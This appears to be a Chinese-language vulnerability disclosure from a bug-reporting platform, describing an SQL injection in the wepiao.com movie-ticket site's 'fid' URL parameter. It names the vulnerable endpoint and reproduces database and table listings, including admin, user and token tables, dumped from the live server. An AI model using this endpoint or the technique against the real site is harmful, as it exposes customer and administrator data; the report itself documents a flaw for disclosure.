2014-12-18: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-02-01: 厂商已经主动忽略漏洞,细节向公众公开
微票儿是微信电影票官方网站,提供超过2000家影院的在线购票服务,是目前全国覆盖影院最多的选座购票平台。貌似很牛B的样子。。。。
订票的时候偶然发现一处注入:
http://www.wepiao.com/?m=web&c=film&a=filmsrc&fid=1787
库名:
available databases [4]:[*] app_weiying[*] app_weiying_test[*] information_schema[*] test
部分表名:
+---------------------------------------+| comment || comment_like || comment_reply || film_seen || film_want || weiying_active || weiying_ad || weiying_admin || weiying_admin_panel || weiying_admin_role || weiying_admin_role_priv || weiying_area || weiying_certificate || weiying_cinema || weiying_city || weiying_code || weiying_device || weiying_evallike || weiying_evaluation || weiying_fctable || weiying_film || weiying_grouponticket_order || weiying_groupticket || weiying_hall || weiying_menu || weiying_notice || weiying_order || weiying_poster || weiying_praise || weiying_preuve || weiying_reply || weiying_sche || weiying_scheseat || weiying_seats || weiying_see || weiying_show || weiying_tagephoto || weiying_ticket || weiying_token || weiying_user || weiying_versions || weiying_webad |+---------------------------------------+Database: app_weiying_test[43 tables]+---------------------------------------+| comment || comment_like || comment_reply || film_seen || film_want || weiying_active || weiying_ad || weiying_admin || weiying_admin_panel || weiying_admin_role || weiying_admin_role_priv || weiying_area || weiying_certificate || weiying_cinema || weiying_city || weiying_code || weiying_device || weiying_evallike || weiying_evaluation || weiying_fctable || weiying_film || weiying_grouponticket_order || weiying_groupticket || weiying_hall || weiying_menu || weiying_notice || weiying_order || weiying_order_stream || weiying_poster || weiying_praise || weiying_preuve || weiying_reply || weiying_sche || weiying_scheseat || weiying_seats || weiying_see || weiying_show || weiying_tagephoto || weiying_ticket || weiying_token || weiying_user || weiying_versions || weiying_webad |+---------------------------------------+Database: information_schema[59 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_BUFFER_PAGE || INNODB_BUFFER_PAGE_LRU || INNODB_BUFFER_POOL_STATS || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_PER_INDEX || INNODB_CMP_PER_INDEX_RESET || INNODB_CMP_RESET || INNODB_FT_BEING_DELETED || INNODB_FT_CONFIG || INNODB_FT_DEFAULT_STOPWORD || INNODB_FT_DELETED || INNODB_FT_INDEX_CACHE || INNODB_FT_INDEX_TABLE || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_METRICS || INNODB_SYS_COLUMNS || INNODB_SYS_DATAFILES || INNODB_SYS_FIELDS || INNODB_SYS_FOREIGN || INNODB_SYS_FOREIGN_COLS || INNODB_SYS_INDEXES || INNODB_SYS_TABLES || INNODB_SYS_TABLESPACES || INNODB_SYS_TABLESTATS || INNODB_TRX || KEY_COLUMN_USAGE || OPTIMIZER_TRACE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
如上
过滤.
未能联系到厂商或者厂商积极拒绝
